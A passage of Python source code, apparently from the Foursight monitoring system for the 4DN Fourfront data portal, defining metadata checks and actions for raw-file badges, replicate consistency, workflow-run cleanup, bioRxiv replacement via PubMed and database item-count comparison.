check = CheckResult(connection, 'exp_has_raw_files')
# search all experiments except microscopy experiments for missing files field
no_files = ff_utils.search_metadata('search/?type=Experiment&%40type%21=ExperimentMic&files.uuid=No+value',
key=connection.ff_keys)
# also check sequencing experiments whose files items are all uploading/archived/deleted
bad_status = ff_utils.search_metadata('search/?status=uploading&status=archived&status=deleted&status=upload+failed'
'&type=FileFastq&experiments.uuid%21=No+value',
key=connection.ff_keys)
bad_status_ids = {item['@id']: item['status'] for item in bad_status}
exps = list(set([exp['@id'] for fastq in bad_status for exp in
fastq.get('experiments') if fastq.get('experiments')]))
missing_files_released = [e['@id'] for e in no_files if e.get('status') not in REV]
missing_files_in_rev = [e['@id'] for e in no_files if e.get('status') in REV]
for expt in exps:
result = ff_utils.get_metadata(expt, key=connection.ff_keys)
raw_files = False
if result.get('files'):
for fastq in result.get('files'):
if fastq['@id'] not in bad_status_ids or result['status'] == bad_status_ids[fastq['@id']]:
raw_files = True
break
if not raw_files:
if result.get('status') in REV:
missing_files_in_rev.append(expt)
else:
missing_files_released.append(expt)
to_add, to_remove, ok = compare_badges(missing_files_released, 'Experiment', 'no-raw-files', connection.ff_keys)
if to_add or to_remove:
check.status = 'WARN'
check.summary = 'Raw Files badges need patching'
check.description = '{} sequencing experiments need raw files badges patched'.format(
len(to_add) + len(to_remove)
)
check.allow_action = True
else:
check.status = 'PASS'
check.summary = 'Raw Files badges up-to-date'
check.description = 'No sequencing experiments need raw files badges patched'
check.action = 'patch_badges_for_raw_files'
check.full_output = {'Add badge': to_add,
'Remove badge': to_remove,
'Keep badge': ok}
check.brief_output = {REV_KEY: missing_files_in_rev,
RELEASED_KEY: {'Add badge': to_add, 'Remove badge': to_remove}}
return check
@action_function()
def patch_badges_for_raw_files(connection, **kwargs):
action = ActionResult(connection, 'patch_badges_for_raw_files')
raw_check_result = action.get_associated_check_result(kwargs)
action.output = patch_badges(
raw_check_result['full_output'], 'no-raw-files', connection.ff_keys, single_message='Raw files missing'
)
if [action.output[key] for key in list(action.output.keys()) if 'failure' in key and action.output[key]]:
action.status = 'FAIL'
action.description = 'Some items failed to patch. See below for details.'
else:
action.status = 'DONE'
action.description = 'Patching badges successful for experiments missing raw files.'
return action
@check_function()
def consistent_replicate_info(connection, **kwargs):
'''
Check for replicate experiment sets that have discrepancies in metadata between
replicate experiments.
Action patches badges with a message detailing which fields have the inconsistencies
and what the inconsistent values are.
'''
check = CheckResult(connection, 'consistent_replicate_info')
repset_url = 'search/?type=ExperimentSetReplicate&field=experiments_in_set.%40id&field=uuid&field=status&field=lab.display_title'
exp_url = 'search/?type=Experiment&frame=object'
bio_url = 'search/?type=Experiment&field=biosample'
repsets = [item for item in ff_utils.search_metadata(repset_url, key=connection.ff_keys) if item.get('experiments_in_set')]
exps = ff_utils.search_metadata(exp_url, key=connection.ff_keys)
biosamples = ff_utils.search_metadata(bio_url, key=connection.ff_keys)
exp_keys = {exp['@id']: exp for exp in exps}
bio_keys = {bs['@id']: bs['biosample'] for bs in biosamples}
fields2check = [
'lab',
'award',
'experiment_type',
'crosslinking_method',
'crosslinking_time',
'crosslinking_temperature',
'digestion_enzyme',
'enzyme_lot_number',
'digestion_time',
'digestion_temperature',
'tagging_method',
'tagging_rounds',
'ligation_time',
'ligation_temperature',
'ligation_volume',
'biotin_removed',
'protocol',
'protocol_variation',
'follows_sop',
'average_fragment_size',
'fragment_size_range',
'fragmentation_method',
'fragment_size_selection_method',
'rna_tag',
'target_regions',
'dna_label',
'labeling_time',
'antibody',
'antibody_lot_id',
'microscopy_technique',
'imaging_paths',
]
check.brief_output = {REV_KEY: {}, RELEASED_KEY: {
'Add badge': {}, 'Remove badge': {}, 'Keep badge and edit messages': {}
}}
compare = {}
results = {}
for repset in repsets:
info_dict = {}
exp_list = [item['@id'] for item in repset['experiments_in_set']]
for field in fields2check:
vals = [stringify(exp_keys[exp].get(field)) for exp in exp_list]
if field == 'average_fragment_size' and 'None' not in vals:
int_vals = [int(val) for val in vals]
if (max(int_vals) - min(int_vals))/(sum(int_vals)/len(int_vals)) < 0.25:
continue
if len(set(vals)) > 1:
info_dict[field] = vals
for bfield in ['treatments_summary', 'modifications_summary']:
bvals = [stringify(bio_keys[exp].get(bfield)) for exp in exp_list]
if len(set(bvals)) > 1:
info_dict[bfield] = bvals
biosource_vals = [stringify([item['@id'] for item in bio_keys[exp].get('biosource')]) for exp in exp_list]
if len(set(biosource_vals)) > 1:
info_dict['biosource'] = biosource_vals
if [True for exp in exp_list if bio_keys[exp].get('cell_culture_details')]:
for ccfield in ['synchronization_stage', 'differentiation_stage', 'follows_sop']:
ccvals = [stringify([item['@id'] for item in bio_keys[exp].get('cell_culture_details').get(ccfield)]) for exp in exp_list]
if len(set(ccvals)) > 1:
info_dict[ccfield] = ccvals
if [True for exp in exp_list if bio_keys[exp].get('biosample_protocols')]:
bp_vals = [stringify([item['@id'] for item in bio_keys[exp].get('biosample_protocols', [])]) for exp in exp_list]
if len(set(bp_vals)) > 1:
info_dict['biosample_protocols'] = bp_vals
if info_dict:
info = sorted(['{}: {}'.format(k, stringify(v)) for k, v in info_dict.items()])
#msg = 'Inconsistent replicate information in field(s) - ' + '; '.join(info)
msgs = ['Inconsistent replicate information in ' + item for item in info]
text = '{} - inconsistency in {}'.format(repset['@id'][-13:-1], ', '.join(list(info_dict.keys())))
lab = repset['lab']['display_title']
audit_key = REV_KEY if repset['status'] in REV else RELEASED_KEY
results[repset['@id']] = {'status': audit_key, 'lab': lab, 'info': text}
if audit_key == REV_KEY:
if lab not in check.brief_output[audit_key]:
check.brief_output[audit_key][lab] = []
check.brief_output[audit_key][lab].append(text)
if repset['status'] not in REV:
compare[repset['@id']] = msgs
to_add, to_remove, to_edit, ok = compare_badges_and_messages(
compare, 'ExperimentSetReplicate', 'inconsistent-replicate-info', connection.ff_keys
)
key_dict = {'Add badge': to_add, 'Remove badge': to_remove, 'Keep badge and edit messages': to_edit}
for result in results.keys():
for k, v in key_dict.items():
if result in v.keys():
if results[result]['lab'] not in check.brief_output[RELEASED_KEY][k].keys():
check.brief_output[RELEASED_KEY][k][results[result]['lab']] = []
check.brief_output[RELEASED_KEY][k][results[result]['lab']].append(results[result]['info'])
break
check.brief_output[RELEASED_KEY]['Remove badge'] = list(to_remove.keys())
if to_add or to_remove or to_edit:
check.status = 'WARN'
check.summary = 'Replicate Info badges need patching'
check.description = ('{} ExperimentSetReplicates found that need a replicate-info badge patched'
''.format(len(to_add.keys()) + len(to_remove.keys()) + len(to_edit.keys())))
else:
check.status = 'PASS'
check.summary = 'Replicate Info badges are up-to-date'
check.description = 'No ExperimentSetReplicates found that need a replicate-info badge patched'
check.full_output = {'Add badge': to_add,
'Remove badge': to_remove,
'Keep badge and edit messages': to_edit,
'Keep badge (no change)': ok}
check.action = 'patch_badges_for_inconsistent_replicate_info'
if to_add or to_remove or to_edit:
check.allow_action = True
return check
@action_function()
def patch_badges_for_inconsistent_replicate_info(connection, **kwargs):
action = ActionResult(connection, 'patch_badges_for_inconsistent_replicate_info')
rep_info_check_result = action.get_associated_check_result(kwargs)
action.output = patch_badges(
rep_info_check_result['full_output'], 'inconsistent-replicate-info', connection.ff_keys
)
if [action.output[key] for key in list(action.output.keys()) if 'failure' in key and action.output[key]]:
action.status = 'FAIL'
action.description = 'Some items failed to patch. See below for details.'
else:
action.status = 'DONE'
action.description = 'Patching successful for inconsistent replicate info badges.'
return action
```
#### File: chalicelib/checks/wrangler_checks.py
```python
from dcicutils import ff_utils
from dcicutils.env_utils import prod_bucket_env_for_app
import re
import requests
import json
import datetime
import time
import itertools
import random
from difflib import SequenceMatcher
import boto3
from .helpers import wrangler_utils
from collections import Counter
from oauth2client.service_account import ServiceAccountCredentials
import gspread
import pandas as pd
from collections import OrderedDict
import uuid
# Use confchecks to import decorators object and its methods for each check module
# rather than importing check_function, action_function, CheckResult, ActionResult
# individually - they're now part of class Decorators in foursight-core::decorators
# that requires initialization with foursight prefix.
from .helpers.confchecks import *
# use a random number to stagger checks
random_wait = 20
@check_function(cmp_to_last=False)
def workflow_run_has_deleted_input_file(connection, **kwargs):
"""Checks all wfrs that are not deleted, and have deleted input files
There is an option to compare to the last, and only report new cases (cmp_to_last)
The full output has 2 keys, because we report provenance wfrs but not run action on them
problematic_provenance: stores uuid of deleted file, and the wfr that is not deleted
problematic_wfr: stores deleted file, wfr to be deleted, and its downstream items (qcs and output files)
"""
check = CheckResult(connection, 'workflow_run_has_deleted_input_file')
check.status = "PASS"
check.action = "patch_workflow_run_to_deleted"
my_key = connection.ff_keys
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
# run the check
search_query = 'search/?type=WorkflowRun&status!=deleted&input_files.value.status=deleted&limit=all'
bad_wfrs = ff_utils.search_metadata(search_query, key=my_key)
if kwargs.get('cmp_to_last', False):
# filter out wfr uuids from last run if so desired
prevchk = check.get_latest_result()
if prevchk:
prev_wfrs = prevchk.get('full_output', [])
filtered = [b.get('uuid') for b in bad_wfrs if b.get('uuid') not in prev_wfrs]
bad_wfrs = filtered
if not bad_wfrs:
check.summmary = check.description = "No live WorkflowRuns linked to deleted input Files"
return check
brief = str(len(bad_wfrs)) + " live WorkflowRuns linked to deleted input Files"
# problematic_provenance stores uuid of deleted file, and the wfr that is not deleted
# problematic_wfr stores deleted file, wfr to be deleted, and its downstream items (qcs and output files)
fulloutput = {'problematic_provenance': [], 'problematic_wfrs': []}
no_of_items_to_delete = 0
def fetch_wfr_associated(wfr_info):
"""Given wfr_uuid, find associated output files and qcs"""
wfr_as_list = []
wfr_as_list.append(wfr_info['uuid'])
if wfr_info.get('output_files'):
for o in wfr_info['output_files']:
if o.get('value'):
wfr_as_list.append(o['value']['uuid'])
if o.get('value_qc'):
wfr_as_list.append(o['value_qc']['uuid'])
if wfr_info.get('output_quality_metrics'):
for qc in wfr_info['output_quality_metrics']:
if qc.get('value'):
wfr_as_list.append(qc['value']['uuid'])
return list(set(wfr_as_list))
for wfr in bad_wfrs:
infiles = wfr.get('input_files', [])
delfile = [f.get('value').get('uuid') for f in infiles if f.get('value').get('status') == 'deleted'][0]
if wfr['display_title'].startswith('File Provenance Tracking'):
fulloutput['problematic_provenance'].append([delfile, wfr['uuid']])
else:
del_list = fetch_wfr_associated(wfr)
fulloutput['problematic_wfrs'].append([delfile, wfr['uuid'], del_list])
no_of_items_to_delete += len(del_list)
check.summary = "Live WorkflowRuns found linked to deleted Input Files"
check.description = "{} live workflows were found linked to deleted input files - \
found {} items to delete, use action for cleanup".format(len(bad_wfrs), no_of_items_to_delete)
if fulloutput.get('problematic_provenance'):
brief += " ({} provenance tracking)"
check.brief_output = brief
check.full_output = fulloutput
check.status = 'WARN'
check.action_message = "Will attempt to patch %s workflow_runs with deleted inputs to status=deleted." % str(len(bad_wfrs))
check.allow_action = True # allows the action to be run
return check
@action_function()
def patch_workflow_run_to_deleted(connection, **kwargs):
action = ActionResult(connection, 'patch_workflow_run_to_deleted')
check_res = action.get_associated_check_result(kwargs)
action_logs = {'patch_failure': [], 'patch_success': []}
my_key = connection.ff_keys
for a_case in check_res['full_output']['problematic_wfrs']:
wfruid = a_case[1]
del_list = a_case[2]
patch_data = {'status': 'deleted'}
for delete_me in del_list:
try:
ff_utils.patch_metadata(patch_data, obj_id=delete_me, key=my_key)
except Exception as e:
acc_and_error = [delete_me, str(e)]
action_logs['patch_failure'].append(acc_and_error)
else:
action_logs['patch_success'].append(wfruid + " - " + delete_me)
action.output = action_logs
action.status = 'DONE'
if action_logs.get('patch_failure'):
action.status = 'FAIL'
return action
# helper functions for biorxiv check
def get_biorxiv_meta(biorxiv_id, connection):
''' Attempts to get metadata for provided biorxiv id
returns the error string if fails
'''
try:
biorxiv = ff_utils.get_metadata(biorxiv_id, key=connection.ff_keys, add_on='frame=object')
except Exception as e:
return 'Problem getting biorxiv - msg: ' + str(e)
else:
if not biorxiv:
return 'Biorxiv not found!'
return biorxiv
def get_transfer_fields(biorxiv_meta):
fields2transfer = [
'lab', 'contributing_labs', 'award', 'categories', 'exp_sets_prod_in_pub',
'exp_sets_used_in_pub', 'published_by', 'static_headers',
'static_content'
]
return {f: biorxiv_meta.get(f) for f in fields2transfer if biorxiv_meta.get(f) is not None}
@check_function(uuid_list=None, false_positives=None, add_to_result=None)
def biorxiv_is_now_published(connection, **kwargs):
''' To restrict the check to just certain biorxivs use a comma separated list
of biorxiv uuids in uuid_list kwarg. This is useful if you want to
only perform the replacement on a subset of the potential matches - i.e.
re-run the check with a uuid list and then perform the actions on the result
of the restricted check.
Known cases of incorrect associations are stored in the check result in
the 'false_positive' field of full_output. To add new entries to this field use the
'false_positive' kwarg with format "rxiv_uuid1: number_part_only_of_PMID, rxiv_uuid2: ID ..."
eg. fd3827e5-bc4c-4c03-bf22-919ee8f4351f:31010829 and to reset to empty use 'RESET'
There are some examples of the title and author list being different enough so
that the pubmid esearch query doesn't find the journal article. In order to
allow the replacement, movement of all the relevant fields and adding replacement static sections
in the action - a parameter is provided to manually input a mapping between biorxiv (uuid)
to journal article (PMID:ID) - to add that pairing to the result full_output. It will
be acted on by the associated action format of input is uuid PMID:nnnnnn, uuid PMID:nnnnnn
NOTE: because the data to transfer from biorxiv to pub is obtained from the check result
it is important to run the check (again) before executing the action in case something has
changed since the check was run
'''
check = CheckResult(connection, 'biorxiv_is_now_published')
chkstatus = ''
chkdesc = ''
check.action = "add_pub_and_replace_biorxiv"
fulloutput = {'biorxivs2check': {}, 'false_positives': {}, 'GEO datasets found': {}}
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
# see if a 'manual' mapping was provided as a parameter
fndcnt = 0
if kwargs.get('add_to_result'):
b2p = [pair.strip().split(' ') for pair in kwargs.get('add_to_result').split(',')]
b2p = {b.strip(): p.strip() for b, p in b2p}
# if there was a manual mapping need to report info to transfer
for bid, pid in b2p.items():
b_meta = get_biorxiv_meta(bid, connection)
if isinstance(b_meta, str):
check.status = "FAIL"
check.description = "Problem retrieving metadata for input data - " + b_meta
return check
fulloutput['biorxivs2check'].setdefault(bid, {}).update({'new_pub_ids': [pid]})
if b_meta.get('url'):
fulloutput['biorxivs2check'][bid].setdefault('blink', b_meta.get('url'))
fulloutput['biorxivs2check'][bid].setdefault('data2transfer', {}).update(get_transfer_fields(b_meta))
fndcnt = len(b2p)
search = 'search/?'
if kwargs.get('uuid_list'):
suffix = '&'.join(['uuid={}'.format(u) for u in [uid.strip() for uid in kwargs.get('uuid_list').split(',')]])
else:
suffix = 'journal=bioRxiv&type=Publication&status=current&limit=all'
# run the check
search_query = search + suffix
biorxivs = ff_utils.search_metadata(search_query, key=connection.ff_keys)
if not biorxivs and not fndcnt:
check.status = "FAIL"
check.description = "Could not retrieve biorxiv records from fourfront"
return check
# here is where we get any previous or current false positives
last_result = check.get_primary_result()
# if last one was fail, find an earlier check with non-FAIL status
it = 0
while last_result['status'] == 'ERROR' or not last_result['kwargs'].get('primary'):
it += 1
# this is a daily check, so look for checks with 12h iteration
hours = it * 12
last_result = check.get_closest_result(diff_hours=hours)
# if this is going forever kill it
if hours > 100:
err_msg = 'Can not find a non-FAIL check in last 100 hours'
check.brief_output = err_msg
check.full_output = {}
check.status = 'ERROR'
return check
last_result = last_result.get('full_output')
try:
false_pos = last_result.get('false_positives', {})
except AttributeError: # if check errored last result is a list of error rather than a dict
false_pos = {}
fp_input = kwargs.get('false_positives')
if fp_input:
fps = [fp.strip() for fp in fp_input.split(',')]
for fp in fps:
if fp == 'RESET': # reset the saved dict to empty
false_pos = {}
continue
id_vals = [i.strip() for i in fp.split(':')]
false_pos.setdefault(id_vals[0], []).append(id_vals[1])
fulloutput['false_positives'] = false_pos
pubmed_url = 'https://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi?db=pubmed&retmode=json'
problems = {}
for bx in biorxivs:
title = bx.get('title')
authors = bx.get('authors')
buuid = bx.get('uuid')
if not (title and authors):
# problem with biorxiv record in ff
problems.setdefault('missing metadata', []).append(buuid)
if not chkstatus or chkstatus != 'WARN':
chkstatus = 'WARN'
msg = "some biorxiv records are missing metadata used for search\n"
if msg not in chkdesc:
chkdesc = chkdesc + msg
# first search with title
suffix = '&field=title&term={}'.format(title)
title_query = pubmed_url + suffix
time.sleep(1)
do_author_search = False
ids = []
res = requests.get(title_query)
if res.status_code == 200:
result = res.json().get('esearchresult')
if not result or not result.get('idlist'):
do_author_search = True
else:
ids = result.get('idlist')
else:
do_author_search = True # problem with request to pubmed
if do_author_search and authors:
author_string = '&term=' + '%20'.join(['{}[Author]'.format(a.split(' ')[-1]) for a in authors])
author_query = pubmed_url + author_string
time.sleep(1)
res = requests.get(author_query)
if res.status_code == 200:
result = res.json().get('esearchresult')
if result and result.get('idlist'):
ids = result.get('idlist')
if buuid in false_pos:
ids = [i for i in ids if i not in false_pos[buuid]]
if ids:
# we have possible article(s) - populate check_result
fndcnt += 1
fulloutput['biorxivs2check'].setdefault(buuid, {}).update({'new_pub_ids': ['PMID:' + id for id in ids]})
if bx.get('url'):
fulloutput['biorxivs2check'][buuid].setdefault('blink', bx.get('url'))
# here we don't want the embedded search view so get frame=object
bmeta = get_biorxiv_meta(buuid, connection)
fulloutput['biorxivs2check'][buuid].setdefault('data2transfer', {}).update(get_transfer_fields(bmeta))
# look for GEO datasets
for id_ in ids:
result = requests.get('https://eutils.ncbi.nlm.nih.gov/entrez/eutils/'
'elink.fcgi?dbfrom=pubmed&db=gds&id={}&retmode=json'.format(id_))
if result.status_code != 200:
continue
geo_ids = [num for link in json.loads(result.text).get('linksets', [])
for item in link.get('linksetdbs', []) for num in item.get('links', [])]
geo_accs = []
for geo_id in geo_ids:
geo_result = requests.get('https://eutils.ncbi.nlm.nih.gov/entrez/eutils/'
'efetch.fcgi?db=gds&id={}'.format(geo_id))
if geo_result.status_code == 200:
geo_accs.extend([item for item in geo_result.text.split() if item.startswith('GSE')])
if geo_accs:
fulloutput['GEO datasets found']['PMID:' + id_] = geo_accs
if fndcnt != 0:
chkdesc = "Candidate Biorxivs to replace found\nNOTE: please re-run check directly prior to running action to ensure all metadata is up to date." + chkdesc
if not chkstatus:
chkstatus = 'WARN'
check.allow_action = True
else:
chkdesc = "No Biorxivs to replace\n" + chkdesc
if not chkstatus:
chkstatus = 'PASS'
check.allow_action = False
check.status = chkstatus
check.summary = check.description = chkdesc
check.brief_output = fndcnt
check.full_output = fulloutput
return check
@action_function()
def add_pub_and_replace_biorxiv(connection, **kwargs):
action = ActionResult(connection, 'add_pub_and_replace_biorxiv')
action_log = {}
biorxiv_check_result = action.get_associated_check_result(kwargs)
check_output = biorxiv_check_result.get('full_output', {})
to_replace = check_output.get('biorxivs2check', {})
for buuid, transfer_info in to_replace.items():
error = ''
pmids = transfer_info.get('new_pub_ids', [])
if len(pmids) != 1:
pmstr = ', '.join(pmids)
action_log[buuid] = '0 or multiple pmids {} - manual intervention needed!\n\tNOTE: to transfer to a single pub you can enter the biorxiv uuid PMID in add_to_result'.format(pmstr)
continue
pmid = pmids[0]
# prepare a post/patch for transferring data
existing_fields = {}
fields_to_patch = {}
post_metadata = transfer_info.get('data2transfer', {})
post_metadata['ID'] = pmid
post_metadata['status'] = 'current'
if 'blink' in transfer_info:
post_metadata['aka'] = transfer_info.get('blink')
# first try to post the pub
pub_upd_res = None
pub = None
try:
pub_upd_res = ff_utils.post_metadata(post_metadata, 'publication', key=connection.ff_keys)
except Exception as e:
error = str(e)
else:
if pub_upd_res.get('status') != 'success':
error = pub_upd_res.get('status')
if error:
if "'code': 422" in error:
# there is a conflict-see if pub is already in portal
pub_search_res = None
error = '' # reset error
try:
search = 'search/?type=Publication&ID={}&frame=object'.format(post_metadata['ID'])
pub_search_res = ff_utils.search_metadata(search, key=connection.ff_keys)
except Exception as e:
error = 'SEARCH failure for {} - msg: {}'.format(pmid, str(e))
else:
if not pub_search_res or len(pub_search_res) != 1:
error = 'SEARCH for {} returned zero or multiple results'.format(pmid)
if error:
action_log[buuid] = error
continue
# a single pub with that pmid is found - try to patch it
pub = pub_search_res[0]
for f, v in post_metadata.items():
if pub.get(f):
if f == 'status' and pub.get(f) != v:
fields_to_patch[f] = v
if f != 'ID':
existing_fields[f] = pub.get(f)
else:
fields_to_patch[f] = v
if fields_to_patch:
try:
puuid = pub.get('uuid')
pub_upd_res = ff_utils.patch_metadata(fields_to_patch, puuid, key=connection.ff_keys)
except Exception as e:
error = 'PATCH failure for {} msg: '.format(pmid, str(e))
else:
if pub_upd_res.get('status') != 'success':
error = 'PATCH failure for {} msg: '.format(pmid, pub_upd_res.get('status'))
if error:
action_log[buuid] = error
continue
else: # all the fields already exist on the item
msg = 'NOTHING TO AUTO PATCH - {} already has all the fields in the biorxiv - WARNING values may be different!'.format(pmid)
action_log[buuid] = {
'message': msg,
'existing': existing_fields,
'possibly_new': post_metadata
}
else:
error = 'POST failure for {} msg: {}'.format(pmid, error)
action_log[buuid] = error
continue
else:
pub = pub_upd_res['@graph'][0]
# here we have successfully posted or patched a pub
# generate a static header with link to new pub and set status of biorxiv to replaced
if not pub:
action_log[buuid] = 'NEW PUB INFO NOT AVAILABLE'
continue
header_alias = "static_header:replaced_biorxiv_{}_by_{}".format(buuid, pmid.replace(':', '_'))
header_name = "static-header.replaced_item_{}".format(buuid)
header_post = {
"body": "This biorxiv set was replaced by [{0}]({2}{1}/).".format(pmid, pub.get('uuid'), connection.ff_server),
"award": post_metadata.get('award'),
"lab": post_metadata.get('lab'),
"name": header_name,
"section_type": "Item Page Header",
"options": {"title_icon": "info", "default_open": True, "filetype": "md", "collapsible": False},
"title": "Note: Replaced Biorxiv",
"status": 'released',
"aliases": [header_alias]
}
huuid = None
try_search = False
try:
header_res = ff_utils.post_metadata(header_post, 'static_section', key=connection.ff_keys)
except Exception as e:
error = 'FAILED TO POST STATIC SECTION {} - msg: '.format(str(e))
try_search = True
else:
try:
huuid = header_res['@graph'][0].get('uuid')
except (KeyError, AttributeError) as e: # likely a conflict - search for existing section by name
try_search = True
if try_search:
try:
search = 'search/?type=UserContent&name={}&frame=object'.format(header_name)
header_search_res = ff_utils.search_metadata(search, key=connection.ff_keys)
except Exception as e:
error = 'SEARCH failure for {} - msg: {}'.format(header_name, str(e))
else:
if header_search_res and len(header_search_res) == 1:
huuid = header_search_res[0].get('uuid')
else:
error = 'PROBLEM WITH STATIC SECTION CREATION - manual intervention needed'
if error:
action_log[buuid] = error
patch_json = {'status': 'replaced'}
if huuid: # need to see if other static content exists and add this one
existing_content = post_metadata.get('static_content', [])
existing_content.append({'content': huuid, 'location': 'header'})
patch_json['static_content'] = existing_content
try:
replace_res = ff_utils.patch_metadata(patch_json, buuid, key=connection.ff_keys)
except Exception as e:
error = 'FAILED TO UPDATE STATUS FOR {} - msg: '.format(buuid, str(e))
else:
if replace_res.get('status') != 'success':
error = 'FAILED TO UPDATE STATUS FOR {} - msg: '.format(buuid, replace_res.get('status'))
# do we want to add a flag to indicate if it was post or patch
if existing_fields:
# report that it was an incomplete patch
msg = 'PARTIAL PATCH'
action_log[buuid] = {
'message': msg,
'existing': existing_fields,
'possibly_new': fields_to_patch,
'all_rxiv_data': post_metadata
}
else:
action_log[buuid] = {'message': 'DATA TRANSFERED TO ' + pmid}
if error:
action_log[buuid].update({'error': error})
action.status = 'DONE'
action.output = action_log
return action
@check_function()
def item_counts_by_type(connection, **kwargs):
def process_counts(count_str):
# specifically formatted for FF health page
ret = {}
split_str = count_str.split()
ret[split_str[0].strip(':')] = int(split_str[1])
ret[split_str[2].strip(':')] = int(split_str[3])
return ret
check = CheckResult(connection, 'item_counts_by_type')
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
# run the check
item_counts = {}
warn_item_counts = {}
req_location = ''.join([connection.ff_server, 'counts?format=json'])
counts_res = ff_utils.authorized_request(req_location, auth=connection.ff_keys)
if counts_res.status_code >= 400:
check.status = 'ERROR'
check.description = 'Error (bad status code %s) connecting to the counts endpoint at: %s.' % (counts_res.status_code, req_location)
return check
counts_json = json.loads(counts_res.text)
for index in counts_json['db_es_compare']:
counts = process_counts(counts_json['db_es_compare'][index])
item_counts[index] = counts
if counts['DB'] != counts['ES']:
warn_item_counts[index] = counts
# add ALL for total counts
total_counts = process_counts(counts_json['db_es_total'])
item_counts['ALL'] = total_counts
# set fields, store result
if not item_counts:
check.status = 'FAIL'
check.summary = check.description = 'Error on fourfront health page'
elif warn_item_counts:
check.status = 'WARN'
check.summary = check.description = 'DB and ES item counts are not equal'
check.brief_output = warn_item_counts
else:
check.status = 'PASS'
check.summary = check.description = 'DB and ES item counts are equal'
check.full_output = item_counts
return check
@check_function()
def change_in_item_counts(connection, **kwargs):
# use this check to get the comparison
# import pdb; pdb.set_trace()
check = CheckResult(connection, 'change_in_item_counts')
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
counts_check = CheckResult(connection, 'item_counts_by_type')
latest_check = counts_check.get_primary_result()
# get_item_counts run closest to 10 mins
prior_check = counts_check.get_closest_result(diff_hours=24)
if not latest_check.get('full_output') or not prior_check.get('full_output'):
check.status = 'ERROR'
check.description = 'There are no counts_check results to run this check with.'
return check
diff_counts = {}
# drill into full_output
latest = latest_check['full_output']
prior = prior_check['full_output']
# get any keys that are in prior but not latest
prior_unique = list(set(prior.keys()) - set(latest.keys()))
for index in latest:
if index == 'ALL':
continue
if index not in prior:
diff_counts[index] = {'DB': latest[index]['DB'], 'ES': 0}
else:
diff_DB = latest[index]['DB'] - prior[index]['DB']
if diff_DB != 0:
diff_counts[index] = {'DB': diff_DB, 'ES': 0}
for index in prior_unique:
diff_counts[index] = {'DB': -1 * prior[index]['DB'], 'ES': 0}
# now do a metadata search to make sure they match
# date_created endpoints for the FF search
# XXX: We should revisit if we really think this search is necessary. - will 3-26-2020
to_date = datetime.datetime.strptime(latest_check['uuid'], "%Y-%m-%dT%H:%M:%S.%f").strftime('%Y-%m-%d+%H:%M')
from_date = datetime.datetime.strptime(prior_check['uuid'], "%Y-%m-%dT%H:%M:%S.%f").strftime('%Y-%m-%d+%H:%M')
# tracking items and ontology terms must be explicitly searched for
search_query = ''.join(['search/?type=Item&type=OntologyTerm&type=TrackingItem',
'&frame=object&date_created.from=',
from_date, '&date_created.to=', to_date])
search_resp = ff_utils.search_metadata(search_query, key=connection.ff_keys)
# add deleted/replaced items
search_query += '&status=deleted&status=replaced'
search_resp.extend(ff_utils.search_metadata(search_query, key=connection.ff_keys))
for res in search_resp:
# Stick with given type name in CamelCase since this is now what we get on the counts page
_type = res['@type'][0]
_entry = diff_counts.get(_type)
if not _entry:
diff_counts[_type] = _entry = {'DB': 0, 'ES': 0}
if _type in diff_counts:
_entry['ES'] += 1
check.ff_link = ''.join([connection.ff_server, 'search/?type=Item&',
'type=OntologyTerm&type=TrackingItem&date_created.from=',
from_date, '&date_created.to=', to_date])
check.brief_output = diff_counts
# total created items from diff counts (exclude any negative counts)
total_counts_db = sum([diff_counts[coll]['DB'] for coll in diff_counts if diff_counts[coll]['DB'] >= 0])
# see if we have negative counts
# allow negative counts, but make note of, for the following types
purged_types = ['TrackingItem', 'HiglassViewConfig', 'MicroscopeConfiguration']
bs_type = 'Biosample'
negative_types = [tp for tp in diff_counts if (diff_counts[tp]['DB'] < 0 and tp not in purged_types)]
if bs_type in negative_types:
if diff_counts[bs_type]['DB'] == -1:
negative_types.remove(bs_type)
inconsistent_types = [tp for tp in diff_counts if (diff_counts[tp]['DB'] != diff_counts[tp]['ES'] and tp not in purged_types)]
if negative_types:
negative_str = ', '.join(negative_types)
check.status = 'FAIL'
check.summary = 'DB counts decreased in the past day for %s' % negative_str
check.description = ('Positive numbers represent an increase in counts. '
'Some DB counts have decreased!')
elif inconsistent_types:
check.status = 'WARN'
check.summary = 'Change in DB counts does not match search result for new items'
check.description = ('Positive numbers represent an increase in counts. '
'The change in counts does not match search result for new items.')
else:
check.status = 'PASS'
check.summary = 'There are %s new items in the past day' % total_counts_db
check.description = check.summary + '. Positive numbers represent an increase in counts.'
check.description += ' Excluded types: %s' % ', '.join(purged_types)
return check
@check_function(file_type=None, status=None, file_format=None, search_add_on=None)
def identify_files_without_filesize(connection, **kwargs):
check = CheckResult(connection, 'identify_files_without_filesize')
# add random wait
wait = round(random.uniform(0.1, random_wait), 1)
time.sleep(wait)
# must set this to be the function name of the action
check.action = "patch_file_size"
check.allow_action = True
default_filetype = 'File'
default_stati = 'released%20to%20project&status=released&status=uploaded&status=pre-release'
filetype = kwargs.get('file_type') or default_filetype
stati = 'status=' + (kwargs.get('status') or default_stati)
search_query = 'search/?type={}&{}&frame=object&file_size=No value'.format(filetype, stati)
ff = kwargs.get('file_format')
if ff is not None:
ff = '&file_format.file_format=' + ff
search_query += ff
addon = kwargs.get('search_add_on')
if addon is not None:
if not addon.startswith('&'):
addon = '&' + addon
search_query += addon
problem_files = []
file_hits = ff_utils.search_metadata(search_query, key=connection.ff_keys, page_limit=200)
if not file_hits:
check.allow_action = False
check.summary = 'All files have file size'
check.description = 'All files have file size'
check.status = 'PASS'
return check
for hit in file_hits:
hit_dict = {
'accession': hit.get('accession'),
'uuid': hit.get('uuid'),
'@type': hit.get('@type'),
'upload_key': hit.get('upload_key')
}
problem_files.append(hit_dict)
check.brief_output = '{} files with no file size'.format(len(problem_files))
check.full_output = problem_files
check.status = 'WARN'
check.summary = 'File metadata found without file_size'
status_str = 'pre-release/released/released to project/uploaded'
if kwargs.get('status'):
status_str = kwargs.get('status')
type_str = ''
if kwargs.get('file_type'):
type_str = kwargs.get('file_type') + ' '
ff_str = ''
if kwargs.get('file_format'):
ff_str = kwargs.get('file_format') + ' '
check.description = "{cnt} {type}{ff}files that are {st} don't have file_size.".format(
